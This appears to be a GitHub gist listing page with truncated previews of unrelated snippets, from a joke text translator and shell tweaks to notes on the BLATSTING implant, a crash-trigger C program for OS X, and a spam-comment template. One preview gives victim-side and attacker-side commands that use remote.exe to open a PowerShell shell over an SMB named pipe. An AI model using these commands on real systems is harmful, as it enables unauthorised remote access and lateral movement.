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I saw a birb

Jacques Pharand Spacecow99

I saw a birb
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Pavelovich /
Last active August 29, 2015 14:15
Neckbeard translator
# Debug strings, comment out entry prompt to test the program
string = "Hello m'lady, please do not friendzone. I am a really nice guy."
string = "M'Hello m'lady, m'please m'do m'not m'friendzone. M'I m'am m'a m'really m'nice m'guy."
def toNeckbeard(string):
string = "M'"+string
string = string.replace(" "," m'")
string = string.replace("m'm'","m'")
anonymous / gist:de6b81c556b5dc7cdc8b
Created February 20, 2015 01:42
Kernel panic in latest OS X in 10 lines of C
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>
main (int argc, char * argv[])
volatile char * library;
const mach_vm_size_t page_size = getpagesize ();
0xabad1dea /
Last active July 12, 2021 01:32
Sever Scam

The Scammiest Scam To Yet Anonymity Scam

I'm still holding out for this being a hoax, a big joke, and that they're going to cancel the kickstarter any minute. It'd be quite the cute "lessons learned" about anonymity scams. However, I will be treating it from here on out as a genuine scam. (As of May 2nd, the kickstarter has been cancelled, after the strangest attempt to reply to this imaginable. Good riddance.)

This absolutely ridiculous thing was brought to my attention by a friend and since it was late at night I thought I must be delirious in how absurdly over the top fake it seemed. So I slept on it, woke up, and found that it had gotten a thousand dollars more funding and was every bit as flabbergasting as I thought it was.

Since I realize that not everyone has spent their entire lives studying computers – and such people are the targets of such scams –

eatonphil / gist:7d57257f65673b343441
Created May 5, 2015 11:47
Bot Dumps Beautiful Uncompiled Spam On My Blog
{I have|I’ve} been {surfing|browsing} online more than {three|3|2|4} hours today, yet
I never found any interesting article like yours. {It’s|It is}
pretty worth enough for me. {In my opinion|Personally|In my view},
if all {webmasters|site owners|website owners|web owners} and bloggers made good content as you did, the {internet|net|web} will be {much more|a lot more} useful than ever before.|
I {couldn’t|could not} {resist|refrain from} commenting.
{Very well|Perfectly|Well|Exceptionally well} written!|
{I will|I’ll} {right away|immediately} {take hold of|grab|clutch|grasp|seize|snatch} your {rss|rss feed} as I {can not|can’t} {in finding|find|to find} your {email|e-mail} subscription {link|hyperlink} or {newsletter|e-newsletter} service.
Do {you have|you’ve} any? {Please|Kindly} {allow|permit|let} me {realize|recognize|understand|recognise|know} {so that|in order that} I {may
just|may|could} subscribe. Thanks.|
uupaa /
Last active May 27, 2024 21:45
image resize in github flavored markdown.

Image source

Try resize it!

  • ![]( | width=100)
cocoalabs / gist:2fb7dc2199b0d4bf160364b8e557eb66
Created August 15, 2016 21:50
Color Terminal for bash/zsh etc..
man() {
env \
LESS_TERMCAP_mb=$(printf "\e[1;31m") \
LESS_TERMCAP_md=$(printf "\e[1;31m") \
LESS_TERMCAP_me=$(printf "\e[0m") \
LESS_TERMCAP_se=$(printf "\e[0m") \
LESS_TERMCAP_so=$(printf "\e[1;44;33m") \
LESS_TERMCAP_ue=$(printf "\e[0m") \
LESS_TERMCAP_us=$(printf "\e[1;32m") \
man "$@"
laanwj / BLATSTING.txt
Last active December 8, 2021 04:07
Wladimir van der Laan 2016. This document is in the public domain.
BLATSTING reverse-engineering notes. Based on files from the EQGRP free dump,
more specifically in Firewall/BLATSTING/BLATSTING_201381/LP/lpconfig.
BLATSTING is described as "A firewall software implant that is used with EGREGIOUSBLUNDER
If true, it's interesting how this implant can target both vendors. Presumably they both use the same Linux
REGSVR odbcconf.dll
mattifestation / gist:8ef36782ceb7f73d74cfb00c2a710301
Created November 19, 2016 17:07
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
marcan /
Last active December 1, 2023 15:18
Linux kernel initialization, translated to bash
# Linux kernel userspace initialization code, translated to bash
# (Minus floppy disk handling, because seriously, it's 2017.)
# Not 100% accurate, but gives you a good idea of how kernel init works
# GPLv2, Copyright 2017 Hector Martin <>
# Based on Linux 4.10-rc2.
# Note: pretend chroot is a builtin and affects the current process
# Note: kernel actually uses major/minor device numbers instead of device name